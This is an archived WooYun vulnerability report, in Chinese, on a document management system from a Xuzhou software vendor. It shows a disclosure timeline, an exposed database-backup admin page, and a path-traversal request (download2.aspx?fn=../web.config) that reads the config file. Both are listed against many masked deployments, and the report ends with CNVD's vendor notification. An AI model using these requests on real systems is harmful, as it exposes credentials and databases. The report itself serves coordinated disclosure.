乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-31: 细节已通知厂商并且等待厂商处理中 2015-11-04: 厂商已经确认,细节仅向厂商公开 2015-11-07: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2015-12-29: 细节向核心白帽子及相关领域专家公开 2016-01-08: 细节向普通白帽子公开 2016-01-18: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
别老拿我的去认领啦~
徐州市华网信息科技有限责任公司产品:电子文档管理系统这个系统的案例还别说,挺多的。。。。漏洞一:数据库备份脱裤实际上都存在这个漏洞,但部分好像老提示备份出错,难道不支持FSO?简单来一些可以备份的:
**.**.**.**:81/admin/backup.aspxhttp://**.**.**.**:81/xwd/admin/backup.aspx**.**.**.**:90/xywd34/admin/backup.aspx**.**.**.**:85/wd2/admin/backup.aspx**.**.**.**:90/xywd24/admin/backup.aspx#**.**.**.**:90/xywd50/admin/backup.aspx**.**.**.**:81/wd/admin/backup.aspx#**.**.**.**:90/xywd8/admin/backup.aspxhttp://**.**.**.**/admin/backup.aspx#
测试见漏洞证明:漏洞二:
/download2.aspx?fn=../web.config/download2.aspx?fn=/download2.aspx
案例:
**.**.**.**:81/download2.aspx?fn=../web.confighttp://**.**.**.**:81/xwd/download2.aspx?fn=../web.config**.**.**.**:90/xywd34/download2.aspx?fn=../web.config**.**.**.**:85/wd2/download2.aspx?fn=../web.config**.**.**.**:90/xywd24/download2.aspx?fn=../web.config**.**.**.**:90/xywd50/download2.aspx?fn=../web.config**.**.**.**:90/xywd8/download2.aspx?fn=../web.confighttp://**.**.**.**/download2.aspx?fn=../web.config**.**.**.**:81/wd/download2.aspx?fn=../web.config**.**.**.**:8080/download2.aspx?fn=../web.config**.**.**.**:8081/download2.aspx?fn=../web.config**.**.**.**:81/download2.aspx?fn=../web.confighttp://**.**.**.**/wd/download2.aspx?fn=../web.confighttp://**.**.**.**/dfsxzzj/download2.aspx?fn=../web.config**.**.**.**/ddzb/download2.aspx?fn=../web.config**.**.**.**/wd18/download2.aspx?fn=../web.config**.**.**.**/wd/download2.aspx?fn=../web.config**.**.**.**/wd24/download2.aspx?fn=../web.config**.**.**.**/wd13/download2.aspx?fn=../web.confighttp://**.**.**.**/wd90/download2.aspx?fn=../web.config**.**.**.**:81/wd/download2.aspx?fn=../web.config**.**.**.**:1106/dqlwd/download2.aspx?fn=../web.confighttp://**.**.**.**/wd/download2.aspx?fn=../web.confighttp://**.**.**.**/download2.aspx?fn=../web.confighttp://**.**.**.**:81/download2.aspx?fn=../web.config**.**.**.**/xywd/download2.aspx?fn=../web.confighttp://**.**.**.**/download2.aspx?fn=../web.confighttp://**.**.**.**:8091/hw/download2.aspx?fn=../web.confighttp://**.**.**.**/xywd/download2.aspx?fn=../web.confighttp://**.**.**.**/xywd/download2.aspx?fn=../web.confighttp://**.**.**.**/wd/download2.aspx?fn=../web.confighttp://**.**.**.**/dzwd/download2.aspx?fn=../web.config**.**.**.**:81/wd/download2.aspx?fn=../web.confighttp://**.**.**.**/wd/download2.aspx?fn=../web.config
1#:
**.**.**.**:81/wd/admin/backup.aspx#
2#:
http://**.**.**.**/dzwd/download2.aspx?fn=../web.config
危害等级:高
漏洞Rank:15
确认时间:2015-11-04 14:53
CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件和电话通报,由其后续提供解决方案并协调相关用户单位处置。
暂无